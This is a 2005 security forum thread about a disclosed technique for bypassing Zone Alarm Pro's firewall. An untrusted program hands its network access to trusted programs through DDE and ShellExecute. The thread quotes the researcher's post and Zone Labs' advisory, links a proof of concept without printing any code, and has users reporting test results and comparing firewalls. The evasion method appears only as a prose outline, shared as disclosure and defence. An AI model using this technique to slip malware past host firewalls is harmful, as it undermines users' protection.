| View previous topic :: View next topic |
| Author |
Message |
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
 Posted: Wed Sep 28, 2005 11:29 pm Post subject: Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC |
|
|
| Quote: | Date: Thu, 29 Sep 2005 00:18:24 +0530
From: Debasis Mohanty <>
To: full-disclosure
Subject: [Full-disclosure] Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC
Hi All !!
While I was testing desktop based firewalls (here it is Zone Alarm Pro) with
the firewall evasion kit developed by me, I found that a very old flaw still
exists in many latest versions of desktop based firewalls. It is possible
for a malicious program to bypass a desktop based firewall by using DDE-IPC
(Direct Data Exchange - Interprocess Communications) which enables an
un-trusted program to communicate with the attacker or access internet via
other trusted programs (Ex: Internet Explorer). This flaw is known since
before year 2003.
As per a post by Te Smith (Sr. Director, Corporate Communications, Zone
Labs), this issue is resolved in higher version Zone Alarm Pro having
Advanced Program Control feature. (Ref #
http://seclists.org/lists/bugtraq/2003/Jul/0000.html) However, I find that
this issue still exists in higher versions of Zone Alarm Pro and might also
exist in other desktop based firewalls.
I didn't find any good PoC around, so I thought of writing a PoC which can
demonstrate and explain how an un-trusted program can access internet or
establish connection with the attacker via other trusted programs by
leveraging over the DDE-IPC design flaw.
The PoC can be downloaded from the following link:
http://hackingspirits.com/vuln-rnd/vuln-rnd.html
|
_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
|
|
| Back to top |
|
 |
Hoov
Zone Alarm Host
PIRT Handler
Joined: Jun 21, 2002
Posts: 4605
Location: USA
|
| Posted: Thu Sep 29, 2005 1:23 am Post subject: |
|
|
I am going to pass this along, as well as download this PoC and see if there is any truth to this.
_________________
For ZoneAlarm help http://www.donhoover.net
|
|
| Back to top |
|
|
chiawaikian
Warnings : 1
Major
Joined: Aug 25, 2005
Posts: 966
Location: Singapore
|
|
| Back to top |
|
|
fax
Corporal
Premium Member
Joined: Jan 17, 2005
Posts: 73
Location: It depends, Europe for sure!
|
| Posted: Thu Sep 29, 2005 5:38 pm Post subject: PoC Failed... |
|
|
Tested in ZA Pro and PoC failed.
A 'dangerous behaviour' is displayed indicating that 'zabypass.exe' is trying to communicate with 'iexplorer.exe' by using DDE. Deny access and the firewall block the PoC.
So where is the vulnerability?
Fax 
| Description: |
|
| Filesize: |
44.14 KB |
| Viewed: |
335 Time(s) |
|
|
|
| Back to top |
|
|
Hoov
Zone Alarm Host
PIRT Handler
Joined: Jun 21, 2002
Posts: 4605
Location: USA
|
| Posted: Thu Sep 29, 2005 6:24 pm Post subject: |
|
|
Probably no where, but even if there is none, its good to know about these things because they spread like wildfire, once the accusation is made. Most times it is because either an old version is being used, or the configuration is such that there are holes in the firewall.
_________________
For ZoneAlarm help http://www.donhoover.net
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
Hoov
Zone Alarm Host
PIRT Handler
Joined: Jun 21, 2002
Posts: 4605
Location: USA
|
| Posted: Thu Sep 29, 2005 11:14 pm Post subject: |
|
|
Hopefully ZoneLabs will give an official statement about this.
_________________
For ZoneAlarm help http://www.donhoover.net
Last edited by Hoov on Fri Sep 30, 2005 4:13 am, edited 1 time in total |
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
| Posted: Fri Sep 30, 2005 2:10 am Post subject: |
|
|
This came across the wire:
| Quote: | Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
Using DDE-IPC"
Overview:
Debasis Mohanty published a notice about a potential security issue
with personal firewalls to several security email lists on
September 28th, 2005. Zone Labs has investigated his claims
and has determined that current versions of Zone Labs and
Check Point end-point security products are not vulnerable.
Description:
The proof-of-concept code published uses the Windows API function
ShellExecute() to launch a trusted program that is used to access
the network on behalf of the untrusted program, thereby accessing
the network without warning from the firewall.
Impact:
If successfully exploited, a malicious program may be able to
access the network via a trusted program. The ability to
access the network would be limited to the functionality of the
trusted program.
Unaffected Products:
ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
and ZoneAlarm Security Suite version 6.0 or later automatically
protect against this attack in the default configuration.
ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
and ZoneAlarm Security Suite version 5.5 are protected against
this attack by enabling the "Advanced Program Control" feature.
Check Point Integrity client versions 6.0 and 5.5 are protected
against this attack by enabling the "Advanced Program Control" feature.
Affected Products:
ZoneAlarm free versions lack the "Advanced Program Control"
feature and are therefore unable to prevent this bypass technique.
Recommended Actions:
Subscribers should upgrade to the latest version of their
ZoneAlarm product or enable the "Advanced Program Control" feature.
Related Resources:
Zone Labs Security Services http://www.zonelabs.com/security
Contact:
Zone Labs customers who are concerned about this vulnerability or
have additional technical questions may reach our Technical Support
group at: http://www.zonelabs.com/support/.
To report security issues with Zone Labs products contact
security@zonelabs.com. Note that any other matters sent to this
email address will not receive a response.
Disclaimer:
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information. Zone Labs and Zone Labs
products, are registered trademarks of Zone Labs LLC. and/or
affiliated companies in the United States and other countries.
All other registered and unregistered trademarks represented in
this document are the sole property of their respective
companies/owners.
Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs,
TrueVector, ZoneAlarm, and Cooperative Enforcement are registered
trademarks of Zone Labs LLC The Zone Labs logo, Check Point
Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point
Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat.
& TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC.
All other trademarks are the property of their respective owners.
Any reproduction of this alert other than as an unmodified copy of
this file requires authorization from Zone Labs. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by Zone Labs LLC.
|
_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
|
|
| Back to top |
|
|
patermann
Captain
Premium Member
Joined: Oct 27, 2004
Posts: 545
Location: UK
|
| Posted: Fri Sep 30, 2005 8:50 am Post subject: |
|
|
| Quote: | Affected Products:
ZoneAlarm free versions lack the "Advanced Program Control" feature and are therefore unable to prevent this bypass technique. |
It appears that ZA free does not protect me as much as I thought it did.  I don't know if any free firewalls are immune to this attack but I think I am going to to have to look for one...
_________________
Folding for all it is worth...
Why it is good to fold / F@H Home Page / F@H links
|
|
| Back to top |
|
|
chiawaikian
Warnings : 1
Major
Joined: Aug 25, 2005
Posts: 966
Location: Singapore
|
| Posted: Fri Sep 30, 2005 1:30 pm Post subject: |
|
|
Good luck finding.
There aren't many free firewalls that offer the same level of protection as ZoneAlarm.
_________________
Security and Malware Board
My blog
|
|
| Back to top |
|
|
fax
Corporal
Premium Member
Joined: Jan 17, 2005
Posts: 73
Location: It depends, Europe for sure!
|
| Posted: Fri Sep 30, 2005 3:10 pm Post subject: |
|
|
The offer of free firewalls is shirking very rapidly at least during this last months…you may want to try Kerio or Sygate, however both products have been sold out. And, if compared to ZA free, they both perform quite poorly against other leak tests.
Fax 
|
|
| Back to top |
|
|
chiawaikian
Warnings : 1
Major
Joined: Aug 25, 2005
Posts: 966
Location: Singapore
|
| Posted: Sat Oct 01, 2005 1:35 am Post subject: |
|
|
Between Kerio and Sygate, Kerio will be a better choice IMO. Sygate has been bought over by Symantec, the maker of the resource-hogger Norton.
_________________
Security and Malware Board
My blog
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
chiawaikian
Warnings : 1
Major
Joined: Aug 25, 2005
Posts: 966
Location: Singapore
|
|
| Back to top |
|
|
|
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
